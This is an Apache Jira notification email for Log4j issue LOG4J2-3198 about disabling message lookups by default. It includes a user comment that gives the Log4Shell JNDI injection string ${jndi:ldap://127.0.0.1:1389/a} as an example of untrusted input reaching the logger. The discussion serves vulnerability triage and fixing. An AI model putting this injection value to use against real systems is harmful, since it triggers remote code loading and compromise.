[ 
https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457298#comment-17457298
 ] 

Eric Everman edited comment on LOG4J2-3198 at 12/10/21, 6:00 PM:
-----------------------------------------------------------------

Is there any possible configuration where the text of substituted parameters 
is substituted?  For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", 
request.getParameter());
{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}
{code}
??


Apparently the answer is 'yes', at least according to the [lunasec.io post on 
this vulnerability|https://www.lunasec.io/docs/blog/log4j-zero-day/].


was (Author: [email protected]):
Is there any possible configuration where the text of substituted parameters 
is substituted?  For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", 
request.getParameter());
{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}
{code}
??

> Message lookups should be disabled by default
> ---------------------------------------------
>
>                 Key: LOG4J2-3198
>                 URL: https://issues.apache.org/jira/browse/LOG4J2-3198
>             Project: Log4j 2
>          Issue Type: Improvement
>          Components: Layouts
>    Affects Versions: 2.14.1
>            Reporter: Carter Kozak
>            Assignee: Carter Kozak
>            Priority: Major
>             Fix For: 2.15.0
>
>
> Lookups in messages are confusing, and muddy the line between logging APIs 
> and implementation. Given a particular API, there's an expectation that a 
> particular shape of call will result in specific results. However, lookups in 
> messages can be passed into JUL and will result in resolved output in log4j 
> formatted output, but not any other implementations despite no direct 
> dependency on those implementations.
> There's also a cost to searching formatted message strings for particular 
> escape sequences which define lookups. This feature is not used as far as 
> we've been able to tell searching GitHub and Stack Overflow, so it's 
> unnecessary for every log event in every application to burn several CPU 
> cycles searching for the value.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)
